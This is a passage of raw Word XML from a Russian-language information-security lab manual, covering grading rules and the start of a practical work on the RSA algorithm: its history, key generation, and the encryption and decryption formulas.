        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Содержание отчета и его форма</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Выполнение задания с оценкой является заключительным действием обучаемого с системой.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>При выполнении практической части на оценку закладка «Теория» становится не доступной. После выполнения задания выставляется оценка в зависимости от количества допущенных ошибок.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Индивидуальные задания для тренировочного и контрольного тестирования выдаются системой автоматически по мере обращения за ними.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="115" w:name="l7"/>
      <w:bookmarkStart w:id="116" w:name="_Toc505525901"/>
      <w:bookmarkEnd w:id="115"/>
      <w:r>
        <w:t>Практическая работа №7</w:t>
      </w:r>
      <w:bookmarkEnd w:id="116"/>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:bookmarkStart w:id="117" w:name="_Toc3811326"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Изучение алгоритма шифрования </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RSA</w:t>
      </w:r>
      <w:bookmarkEnd w:id="117"/>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Цель работы:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> изучение алгоритма шифрования </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RSA</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="118" w:name="_Toc3811327"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Теоретическое обоснование</w:t>
      </w:r>
      <w:bookmarkEnd w:id="118"/>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В 1978 году американцы Р. Ривест, А. Шамир и Л. Адлеман предложили пример функции, обладающей рядом замечательных достоинств. На её основе была построена реально используемая система шифрования, получившая название по первым буквам имен авторов – система </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RSA</w:t>
      </w:r>
      <w:r>
        <w:t>. Эта функция такова, что:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) существует достаточно быстрый алгоритм вычисления значений </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>) существует достаточно быстрый алгоритм вычисления значений обратной функции 1/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) функция </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>) обладает некоторым «секретом», знание которого позволяет быстро вычислить значения 1/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>); в противном же случае вычисление 1/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) становится трудноразрешимой в вычислительном отношении задачей, требующей для своего решения столь много времени, что по его прошествии зашифрованная информация перестает представлять интерес для лиц, использующих отображение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в качестве шифра.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Пример функции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mod</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> [(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>-1)*(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-1)], где: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> &lt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB0648">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – простые числа</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Криптосистема </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RSA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> основана на задаче разложения большого числа на простые множители и требует нескольких подготовительных операций:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1) Выбираем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - два больших простых числа.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2) Находим </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3) Выбираем произвольное число </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4) Находим число </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> такое, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">=1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mod</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> [(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>-1)(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:t>-1)].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Криптосистема:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:t>={</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>} - открытый ключ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r>
        <w:t>={</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>} - закрытый ключ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>х - исходное сообщение</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>у - криптограмма</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Е</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xs</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB0648">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mod</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB0648">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB0648">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - зашифрование</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>yt</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB0648">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mod</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB0648">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – расшифрование</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="259080" cy="22860"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="36" name="Рисунок 36" descr="Y:\4_complate\бакалавры\+Информационная безопасность(Люля)\course\resources\CoursePreview\lab.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4_complate\бакалавры\+Информационная безопасность(Люля)\course\resources\CoursePreview\lab.files\image050.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:link="rId98">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="259080" cy="22860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00FB0648">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="119" w:name="_Toc505525903"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Методика и порядок выполнения работы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="119"/>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Практическая работа состоит из нескольких закладок, демонстрирующих принципы работы алгоритма </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RSA</w:t>
      </w:r>
      <w:r>
        <w:t>, использование электронной подписи на его основе, зашифрование и расшифрование файлов, нахождение простых чисел и пар чисел на их основе для закрытых и открытых ключей. Переходы между закладками могут производиться в произвольном порядке, в зависимости от интересов обучаемого.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
